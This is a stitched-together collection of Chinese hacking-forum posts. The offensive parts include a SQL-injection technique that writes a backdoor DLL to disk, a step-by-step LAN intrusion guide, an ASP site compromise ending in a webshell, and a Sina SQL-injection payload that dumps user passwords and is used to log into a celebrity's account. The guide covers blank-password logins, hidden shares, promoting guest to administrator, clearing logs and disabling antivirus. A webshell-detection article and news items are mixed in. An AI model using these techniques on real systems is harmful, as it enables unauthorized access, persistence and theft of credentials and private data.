Secbone 发布的文章

来自:90 sacret Team信息安全团队



我提供的这种方法相对来说条件较为苛刻,不过在这就是一个思路,可能在你入侵受阻的时候真的能帮到你。我们先来看下这个注入点的要求:







1、magic_quote 为off

2、可以写文件,最好有任意目录的写权限

3、最好有读文件的权限,但如果真没有也行

4、注入点需要是POST方式的(这样可以一次post128KB大小的文件)

为什么需要这么几个条件,后面我会详细的说,先说下我的思路,大家都知道,mysql也是可以写文件的,但大家可能更多的是用在写一个shell出来,其实我们也可以考虑写入一个其他类型的文件,比如exe、dll,这里我的思路就是通过dll方式来提权。先介绍一个Rices写的工具:T00ls Lpk Sethc。简单的说,通过该工具生成的dll文件,放在一个有exe文件的目录,那么等这个exe文件执行后,系统就被安装上了sethc后门,关于该工具的具体用法,叉子们可以百度一下。我就是想通过mysql的dumpfile方式,将这个lpk.dll文件写到一个存在exe的目录,等这个exe执行后,我们就提权成功了。这就是为什么我们需要magic_quote_gpc为OFF,因为这样我们才可以写文件,而可以写的目录越多那么成功率自然越大。为什么要有读取权限?因为我们并不知道目标网站的结构,也不知道哪里存在exe文件,那么我们可以先读取一些比较常见程序的安装目录下的敏感文件,比如说Navicat 的localization里的default.loc文件,如果我们读取到了这个文件,那么基本可以确定了Navicat的目录,再写入dll文件的话,成功的概率会更高。为什么需要POST方式呢?因为这个dll虽然不大,但远远超过了GET的大小,所以需要是POST方式的注入点。好了,基本情况介绍到这,我们开始吧。-

首先本地构造一个注入点,这个我就不说了。我们首先要做的是得到这个dll文件十六进制形式。这个我们可以在本地完成,我使用navicat配合mysql,先打开navicat,连接上mysql,打开任意一个数据库,然后选择“查询



接着我们输入命令:“select hex(load_file(‘f:/lpk.dll’)) into outfile ‘f:/xxoo.txt’;”其中f:/lpk.dll就是dll文件的位置,后面则是十六进制方式输出的文件。直接完毕后,我们到F盘下看看,果然出现一个xxoo的文本文件,大小为118KB,虽然增大了不少但还在安全范围(128KB)内,我们继续,接下来就是到注入点中了,本地构造的注入点为:

http:///www.2cto.com /1.php?id=1

放到穿山甲中试试



POST类型的注入,magic_quote_gpc为off。我们先来看看有多少个字段,我们可以通过order by 的方式得到,像我这种比较懒的就直接看源码了,其中有这句:“  $sql = “select username,password from admin where id=$id”;”这么说字段数是2。接下来就是注入了,这里我们要写个简单的html文件来提交,毕竟那个十六进制字符的文件有118KB呀。写好的html代码为:

<form action=http://www.2cto.com /1.php method=post>

<textarea name=id cols=120 rows=10 width=45>这填lpk的二进制代码   </textarea><BR><center><br>

<input type=submit value=提交



接下来就是写入代码了:

1 and 1=2 union select unhex(‘*******’),” into dumpfile ‘F:/Navicat Premium V8.2.19/Navicat 8.2.12/Navicat 8.2.12

Unhex里为lpk的十六进制,大家请注意,在unhex后面,还有两个单引号,这是为了不产生多余的字符,破坏了dll文件。接着我们点击提交,然后去该目录查看,发现lpk已经安静的在那躺着了。这样,我们再运行一下Navicat,不需要任何操作。我们再调出sethc按下A+B,然后输入123



到此,我们的后门就安装成功了。

这种方式的提权需要的条件较为苛刻,还需要一点运气,不过入侵就是这样,多学一种方法在入侵的时候就多一条路。

1.入侵的范围只包括局域网,如果在学校上,可以入侵整个校园网;

2.能入侵的只是存在弱口令(用户名为administrator等,密码为空),并且开了139端口,但没开防火墙的机子。 入侵工具: 一般要用到三个:NTscan变态扫描器,Recton--D贺免杀专用版,DameWare迷你中文版 4.5. (前两个工具杀毒软件都会报毒,建议将杀毒软件实时防毒暂时关掉,并将这两个软件的压缩包加密,防止被杀。)



入侵步骤:



1.使用"NTscan变态扫描器",在IP处填上要扫描的IP范围,选择"WMI扫描"方式,按"开始"后就等扫描结果了。



2.使用"Recton--D贺免杀专用版" 选择"CMD命令"项,在"CMD:"中输入"net share C$=C:\",即可开启远程主机的C盘共享,以此将"C"换成D,E,F等,即可开启D盘,E盘,F盘等的共享,这种共享方式隐蔽性很高,而且是完全共享,在对方主机上不会出现一只手托住盘的共享标志,然后在地址栏中输入"\\对方IP\C$",即可进入对方C盘。 选择"Telnet"项,在"远程主机"中输入刚才扫描到的一个IP,远程启动Telnet服务,成功后在"CMD选项"中,执行命令:"net share ipc$",接着执行:"net share admin$",最后执行"net use\\***.***.***.***\IPC$"" /user:administrator"在*处填入你入侵的主机IP。



3.使用"DameWare迷你中文版 4.5",安装后点"DameWare Mini Remote Control",在"帮助"项中选择激活产品,输入注册信息,成功注册后,进入"远程连接"窗口,在"主机"处填入IP地址,点"设置",在"服务安装选项"中点"编辑"后,在"通知对话框"中去掉"连接时通知",在"附加设置"中全都不选,在"用户选项"中去掉"启用用户选项菜单"。设置完成好后,就可点"连接",在弹出的对话框中点"确定"后,成功后你就可以像操作自己机子一样控制别人电脑了,当然你也可以只选择监视对方屏幕。 注意:如果不注册的话,在对方主机上会弹出一个对话框,暴露你的身份。



     入侵步骤补充:



1.在以上第2步中,远程启动Telnet服务可以通过"我的电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动"完成。



2.Recton--D贺免杀专用版还有其他功能,在"进程"项中,可以查看远程主机的进程,并可任意结束其中进程;在"共享"项中,可以创建共享,我常用的是创建C$,D$,E$,F$,共享路径分别对应C:\,D:\等,共享好后在地址栏中输入"\\IP\C$",进入对方C盘,你就可以随意复制删除里面的东西了,而且这种共享对方机子盘符上不会显示共享图标,也就不会被发现,弄完后最好还是把共享给关掉。最后选"日志",清除所有日志,不留痕迹。这个软件会被杀毒软件当作病毒杀掉,用它时须将实时防毒关掉。



3.上面的共享可通过CMD(程序-附件-命令提示符)完成,首先"telnet IP",telnet上去,键入y后输入的用户名"administrator",密码为空, 进入后,开共享用net share命令,共享C$(即C盘):"net share C$=C:",共享system文件夹:"net share c=c:\winnt\system32",共享IPC$用:"net share IPC$"等,最后是关闭共享,关闭C盘共享:"net share C$ /del"。



4.为方便下次入侵,可以设置后门, 查看用户:"net user",激活guest用户 "net user guest /active:yes",更改guest的密码为poco:"net user guest poco",把guest的权限提升为管理员权限:"net localgroup administrators guest /add"。



5.telnet命令(dos命令)很多,可去网上查找它的命令,常用的有:查看D盘文件:""dir d:\",查看C盘program file文件夹:"dir c:\PROGRA~1\;",60秒倒记时关机:"shutdown -s -t 60"……………………好了以上就是局域网侵入的通法了,切记不要用于非法用途啊!学弟们一定要不断学习啊!



本文摘自: 黑盾科技论坛(http://www.hdhacker.com) 详细出处请参考:http://www.hdhacker.com/thread-86863-1-3.html

y:秋水

第一次写这东东。。别人要看,就。。。

Asp2年没弄了,囧。。大牛过~~~~~。闲着没事情,晚上了。好久没动笔了,

开始


And 1=1和and 1=2和’(单引号)出现的问题是一样的如上图所示图1。然后我们继续

我们去掉?后边的参数和值,如下图2


出错了,然后我们继续,我们会发现出错信息是/news.asp ,行27,有问题,那我们就把参数写上看看。如下图3


看见了么。说是没文章,那我们溢出它,看图4


我就多写了个111111111111111就出错了,说是溢出了,呵呵,溢出下面还是有信息,那我们打开看看是什么,里面是不是有什么参数,其实跟PHP道理是一样的。

看图5


出现问题了吧,哎呀。这个你们都懂的吧。呵呵。。

下图6


然后到数据库里面找MD5啊。呵呵。图7


图7

下面就是路径了,找了个扫路径的,图8


路径出来,进入看看。


图9

下边就是shell了,MY动力~~~,是个人的还是企业的,我不知道。以前没见过。。。我真的没见过啊,囧。。。

在网站配置那地方,下面有个版权信息,你写上相应的一句话就可以了。然后去INC/CONFIG的目录下,链接一句话,OK。结束。

from 九区

0x00  前言

0x01  Webshell检测模型

0x02  静态特征检测

0x03  动态特征检测

0x04  结语





0x00  前言



    什么是webshell?我相信如果看官能有兴趣看这篇文章,一定对webshell有个了解。不

过不了解也没关系,那就请先搜索下相关资料[1]。当然,本着“know it then hack it”

的原则,建议你还是搭个环境,熟悉下先,毕竟纸上谈兵是要不得的。



    随着网络的发展,Web站点的增加,webshell这种脚本后门技术也发展起来了,多少黑

客故事都是从一个小小的webshell开始的。所以对于网站,特别是站点和应用众多的互联网

企业,能够在出现webshell的阶段及时发现和响应就显得尤为重要。



    本文以笔者多年从事相关工作的经验来探讨下webshell的检测手段。





0x01  Webshell检测模型



    记得当年第一个ASP木马出来的时候号称“永不被杀的ASP木马”(请大家虔诚地起立,

我们一起来膜拜一下海洋顶端ASP木马之父LCX大叔),因为它使用正常端口,且脚本容易变

形,使得查杀它变得困难。但是,Webshell这种特殊的Web应用程序也有两个命门:文件和

HTTP请求。



    我们先来看下Webshell的运行流程:hacker -> HTTP Protocol -> Web Server -> CGI。

简单来看就是这样一个顺序:黑客通过浏览器以HTTP协议访问Web Server上的一个CGI文件。

棘手的是,webshell就是一个合法的TCP连接,在TCP/IP的应用层之下没有任何特征(当然

不是绝对的),只有在应用层进行检测。



    黑客入侵服务器,使用webshell,不管是传文件还是改文件,必然有一个文件会包含

webshell代码,很容易想到从文件代码入手,这是静态特征检测;webshell运行后,B/S数

据通过HTTP交互,HTTP请求/响应中可以找到蛛丝马迹,这是动态特征检测。





0x02  静态特征检测



    静态特征检测是指不执行而通过围观的方式来发现webshell,即先建立一个恶意字符串

特征库,然后通过在各类脚本文件中检查是否匹配。这是一种最简单也是最常见的技术,高

级一些的,可能还涉及到语义分析。笔者06年开发的“雷客图ASP站长安全助手”[2]即是通

过此类办法查找ASP类型的webshell的。



    静态特征检测面临的一个问题是误报。因为一些特征字符串正常程序本身也需要用到。

比如PHP里面的eval、system等,ASP里面的FileSystemObject、include等。所以雷客图在

设计之初就是一个辅助工具,最终还需要有相关安全经验的人来判定。



    对于少量站点可以用这样人肉去检查,如果是一个成千上万站点的大型企业呢,这个时

候再人肉那工作量可就大了。所以用这样一种思路:强弱特征。即把特征码分为强弱两种特

征,强特征命中则必是webshell;弱特征由人工去判断。加入一种强特征,即把流行webshell

用到的特征作为强特征重点监控,一旦出现这样的特征即可确认为webshell立即进行响应。

比如PHPSpy里面会出现phpspy、wofeiwo、eval($_POST[xxx])等,ASP里面出现Shell.Application

等。当然,黑客完全可以变形躲过,没关系,还有人工检查的弱特征。



    另一个问题是漏报。程序的关键是特征字符串,它直接关系着结果,如果你的特征库里

面没有记录的甚至是一种新的webshell代码,就可能束手无策了。雷客图第一版出来后,我

自以为所有的ASP webshell都可以查了,但是我错了,因为不断会有新的方式出来绕过,最

终结果就是特征被动的跟着webshell升级而升级,同时还面临未知的webshell——这个情况

和特征码杀毒软件何其相似。



    要解决误报和漏报,就不能拘泥于代码级别了。可以换个角度考虑问题:文件系统。我

们可以结合文件的属性来判断,比如apache是noboy启动的,webshell的属主必然也是nobody,

如果我的Web目录无缘无故多了个nobody的文件,这里就有问题了。最理想的办法是需要制度

和流程来建设一个Web目录唯一发布入口,控制住这个入口,非法进来的Web文件自然可以发

现。





0x03  动态特征检测



    webshell传到服务器了,黑客总要去执行它吧,webshell执行时刻表现出来的特征,我

们称为动态特征。



    先前我们说到过webshell通信是HTTP协议。只要我们把webshell特有的HTTP请求/响应

做成特征库,加到IDS里面去检测所有的HTTP请求就好了。



    这个方案有个问题就是漏报。首先你得把网上有的webshell都搜集起来抓特征,这是个

体力活,新的webshell出来还要去更新这个库,总是很被动,被动就算了,但是一些不曾公

开的webshell通信就会漏掉。那么这个方案有没有效果,只能说效果有限吧,对付拿来主义

的菜鸟可以,遇到高级一些的黑客就无效了。杀毒软件都搞主动防御了,webshell也不能老

搞特征码是吧。



    webshell起来如果执行系统命令的话,会有进程。Linux下就是nobody用户起了bash,

Win下就是IIS User启动cmd,这些都是动态特征,不过需要看黑客是否执行命令(多半会这

样),还有就是你的服务器上要有一个功能强大的Agent。要是黑客高兴,再反连回去,这

下就更好了,一个TCP连接(也可能是UDP),Agent和IDS都可以抓现行。这里还涉及到主机

后门的一些检测策略,以后有机会再另文叙述。



    回到网络层来,之前我们探讨过,Webshell总有一个HTTP请求,如果我在网络层监控HTTP

请求(我没有监控Apache/IIS日志),有一天突然出现一个新的PHP文件请求或者一个平时

是GET请求的文件突然有了POST请求,还返回的200,这里就有问题了。这种基于区别于正常

请求的异常模型,姑且称之为HTTP异常请求模型检测。一旦有了这样的模型,除了Webshell,

还可以发现很多问题的。



    还有一个思路来自《浅谈javascript函数劫持》[3]和某款代码审计软件。回忆一下,

我们调试网马的时候,怎么还原它各种稀奇古怪的加密算法呢,简单,把eval改成alert就

好了!类似的,所以我们可以在CGI全局重载一些函数(比如ASP.Net的global.asax文件),

当有webshell调用的时候就可以发现异常。例如以下ASP代码就实现了对ASP的execute函数

的重载:



--code-------------------------------------------------------------------------

<%

Function execute(stra)

    Response.Write("get the arg : "+stra)

End Function

a="response.write(""hello,world"")"

execute(a)

%>

-------------------------------------------------------------------------------



    这个方法在应用层还是有些问题,所以如果在CGI引擎内核里面改可能会好些。根据小

道消息,这期ph4nt0m的webzine会有一篇文章涉及PHP内核中防webshell的,有兴趣的同学

可以关注。





0x04  结语



    本文只探讨了检测Webshell的一些思路,希望对你有些帮助,如果你有更好的方案,也

可以和我探讨。至于一些工具和特征,由于这样那样的原因就不公开了,我始终认为,相比

于工具,思路永远是最重要的。





文章作者:lake2 - 这个ID不用我解释,某组织的牛淫

进谷歌 找注入                         弄小站 挺辛苦
没注入 就旁注                         搞大站 更没谱
没旁注 用Oday                         日不下 找楼主
没Oday 猜目录                         日不下 找楼主
没目录 就嗅探                         求0day 需帮助
没嗅探 去跳楼                         楼主曰 得好处
没死掉 就继续                         我说行 咱五五
爆账户 找后台                         楼主猛 通门路
传小马 放大马                         有0day 还热乎
拿权限 挂页面                         搞一宿 没侵入
放暗链 清数据                         我不解 问缘故
清日志 留后门                        “艹他马 洞已补!”

T00ls.Net长期被DDOS、CC,服务器不堪重负,现暂时关闭网站,希望未来或能解决此问题:



① 若有发展或指导性建议,请邮件或者微博联系管理员,但或不予以直接答复,请谅解。

② 重新开放时间请关注微博或者本站点,感谢大家长期以来对T00ls支持。

③ 感谢DDOSer们对T00ls的热爱,T00ls会因你们而进步。



1.jpg

记者1月10日从国家互联网信息办获悉,近期一些媒体报道或在网上流传的数家网站用户信息被泄露的事件,引起互联网管理部门的高度重视。目前,相关事实已由公安机关查明,违法人员已经或将要被依法严肃查处。

  据这位发言人介绍,近期查处的信息泄露事件主要有五个。

  一是CSDN、天涯网站被入侵事件。经查,这两家网站曾在2009年以前被入侵,数据遭泄露也发生在两年前,近期这两家网站并未遭受攻击。网名“臭小
子”的许某某(男,19岁,无业人员)出于个人炫耀的目的,于去年12月4日在乌云网上发帖称CSDN等网站数据密码被泄露,并公布泄露的数据包截图。现
许某某已被公安机关予以训诫。公安机关对这两家网站遭入侵事正在溯源追查。

  二是网上流传的京东商城网站被入侵事。经查,这个网站确遭入侵但数据未被泄露。网名“我心飞翔”的犯罪嫌疑人要某(男,35岁,陕西省咸阳市某制药厂
员工)于2011年4月发现京东商城网站存在安全漏洞,当年12月29日在乌云网上发帖称掌握京东商城漏洞,以公布该安全漏洞要挟京东商城向其支付270
万元。京东商城网站未予支付,要某也并未窃取、泄露该网站相关数据。要某因涉嫌敲诈勒索,现已被依法刑事拘留。

  三是“YY”语音聊天网站泄露数据事。经查,广东“YY”语音聊天网站泄露的数据,系该公司员工利用职务之便从公司内部备份数据库窃取的。该网站并未被入侵。此事正在处理之中。

  四是网上流传的工商银行等金融机构数据泄露事。经有关部门对工商银行、民生银行、交通银行调查,证实其系统并未被入侵,网上公布的所谓“数据”与银行
相关数据不符。网名“挨踢客”的王某某(男,24岁)从事网络推广工作,为了提高自己所在网站的知名度和自我炒作,于2011年12月28日在其个人的挨
踢客网站和微博上凭空捏造,发布所谓工商银行等网站用户数据泄露的信息,王某某已被公安机关予以训诫。五是网上流传的新浪微博、当当网等网站被攻击事。经
查,新浪微博、开心网、7K7K网站、当当网、凡客诚品等网站均未被入侵。网上公布的上述网站部分账号密码系有人利用网络远程大规模猜测密码所破解,实施
密码破解的人员身份目前已被锁定,公安机关正在实施抓捕。

  截至目前,公安机关此次已查处入侵、窃取、倒卖数据案件9起,编造并炒作信息泄露案件3起,刑事拘留4人,予以治安处罚8人。

  国家互联网信息办发言人表示,从上述案例可以看到一些人编造或炒作网站用户信息被大规模泄露的消息,既有出于个人进行炫耀或骗取钱财的目的,也有一些
网络安全公司销售人员想以此提高知名度、推销自己的产品,还有个别人借机企图干扰和贬损北京等城市正在开展的微博客用户用真实身份信息注册工作。

  他指出,国家互联网信息办公室、工信部和公安部等有关部门对非法入侵网站泄露数据信息的犯罪行为予以强烈谴责,并将依法严惩;对编造散布谣言的行为予
以谴责和查处。有关部门将继续采取有效措施,保护公民个人身份信息安全。公安机关将严厉打击非法入侵网站泄露数据信息的行为以及捏造事实、编造和传播谣言
的行为,并依法查处相关人员。各网站必须进一步建立健全用户信息安全管理制度,强化工作人员信息安全意识,严禁泄露用户信息,提高反病毒、反黑客能力,确
保用户信息安全。

CSDN“泄密门”两名黑客已经落网

昨天,几乎让互联网裸奔的“CSDN泄密门”事件传出最新消息,两名涉案黑客已经被抓,还有部分人员尚未落网。

日前,CSDN网站数据库遭黑客入侵,600万用户注册邮箱和密码被泄露。此后人人网、天涯社区、百合网等众多知名网站数千万网友个人信息相继被泄露,更有人将其做成压缩包,上传至网络供人下载。国内网站纷纷“沦陷”,大有“裸奔”之势。

记者昨日联系到北京市公安局外宣处,工作人员表示,目前已有两名涉案黑客被抓,由于部分涉案人员没有归案,具体案情尚不便向外界透露。北京市公安局外宣处相关负责人员告诉记者,此次泄密与实名制无关。

摘自:雅虎新闻   

    正义网浙江1月4日电(通讯员 王红)只因“个人兴趣”,19岁的李胖胖利用木马程序非法侵入公安局网站服务器,获取他人计算机控制权。2011年12月28日,浙江省台州市椒江区检察院以非法控制计算机信息系统罪对李胖胖提起公诉。据悉,这是浙江省检察机关首次起诉这一罪名的案件。

    据了解,1992年4月出生的李胖胖是贵州省遵义人,初中文化。2009年,李胖胖开始接触互联网,通过在QQ群和网上论坛的学习,掌握了网络攻击、网络漏洞扫描等黑客软件的使用方法。2011年2月开始,李胖胖在互联网上用软件随机扫描服务器漏洞,并通过软件自动建立新的用户名和密码,从而获取服务器的控制权。

    李胖胖交代,自己控制别人的计算机,完全是出于个人兴趣,并不是为了赚钱。得到服务器控制权后,他就到QQ群里叫卖,每个只卖5元到25元不等。

    2011年2月5日,李胖胖侵入并控制了“台州市网上公安局”网站服务器。3月15日,台州市公安局公共信息网络安全监察队工作人员在维护服务器时,发现有黑客侵入的痕迹和非法木马文件,可能对业务造成重大影响。工作人员通过技术侦查,锁定了犯罪嫌疑人李胖胖,随即报案。9月22日,李胖胖在遵义家中被警方抓获。经查,他共非法控制了包括台州市公安局网站服务器在内的34台服务器。

    据办案检察官介绍,非法控制计算机信息系统罪是根据刑法修正案(七)修改的新罪名。根据全国人大法工委刑法室对于该罪的释义,所谓的侵入是指未经授权或者他人同意,通过技术手段进入计算机信息系统。非法控制是指通过各种技术手段,使得他人的计算机信息系统处于掌控之中,能够接受其发出的命令。李胖胖利用木马程序非法侵入他人计算机服务器,符合这一罪名的构成要件。另外,“两高”出台的关于办理危害计算机信息系统安全刑事案件的相关司法解释规定,非法获取计算机信息系统数据或者非法控制计算机信息系统,非法控制计算机信息系统20台以上的,属于情节严重。李胖胖非法控制他人计算机服务器34台,已属于情节严重。



各位  兴趣归兴趣    玩玩就够了  我们都懂的~~

看到 公安的服务器还是乖点---------

相关厂商:www.sina.com

作者:http://weibo.com/evilniang

发现时间:2012-1-1

漏洞类型:sql注射

危害等级:高

漏洞状态:已修复



首先申明:该漏洞发现后本人已联系新浪官方修复漏洞,目前漏洞以修补。文章内容公布,仅供参考学习。



新浪网iask存在sql注射漏洞,利用漏洞可读取iask数据库内内容。包括明文密码在内的7000多W新浪用户信息。



漏洞存在点: http://iask.sina.com.cn//prize/event_getorderlist.php?id=999999.9



漏洞利用方式:



http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+%60whatis%60.user+where+uid=1303977362+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11--



这里我们通过构造数据库查询语句获得用户uid=1303977362的uid、login、email、passwd等信息。通过修改字段还可以获取其他信息 。



直接举个例子比如我们通过新浪微波查找到刘谦,点击他的个人资料。我们可以再浏览器地址栏处看到刘谦的uid(新浪用户数字id),此处uid为12715428867







直接构造地址



http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+%60whatis%60.user+where+uid=12715428867+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11--



直接获得刘谦的账号和密码







这里账号是luchenmagic密码为2lo*****(保密)



尝试登陆







成功登陆。刘谦微薄。这里你可以看看你的偶像的各种私信,聊天记录之类的。



接下来的事情你可以自由发挥了。但是对于一个黑客而言,这只不过是一个开始而已(这里我并无恶意,拿刘谦的账号来测试只是为了致敬,希望有机会能够见证奇迹!)。



后话:



1.2011年年底的csdn、天涯等用户库的泄露只不过是冰山一脚。



2.新浪在csdn、天涯等用户库泄露后申称新浪数据库并没有泄露,而且密码是密文保存。这里要提出质疑了,数据库密码明明是明文保存。至少iask中大部分用户是明文保存密码(部分用户查不到密码)。至于用户信息是否泄露,这个不用说了把?



3.网络泄密涉及到太多。不管是普通网民,还是明星名人,都被牵涉进来。这里测试不少明星,基本上都能通过微薄获取他们的私人信息,甚至登陆他们的msn。(香港爆料杂志来找我把。开个玩笑。。。)



4.这个漏洞发现后我便通知了新浪官方,新浪在漏洞反馈和应急处理这方面做的不够快。收到漏洞后连给我回个邮件或者表示感谢都没有。(我是无私奉献白帽子,被活雷锋了。)



5.祝新年快乐。

----------------------------------------------------

游侠补充:

  刚从流量统计系统看到阅读者暴增,原来是文中例子的主角刘谦先生在微博发了一条……好吧:这个事情,仅仅是刘谦先生的粉丝在做个安全测试,并无恶意。我们都喜欢刘先生的魔术。

  谢谢刘谦先生给我博客打广告……来西安我请你吃肉夹馍、羊肉泡馍——管饱! :)

  另:文章是新浪打了补丁之后作者才发出来的,看到本文的时候还想测试的话……晚了。嘿嘿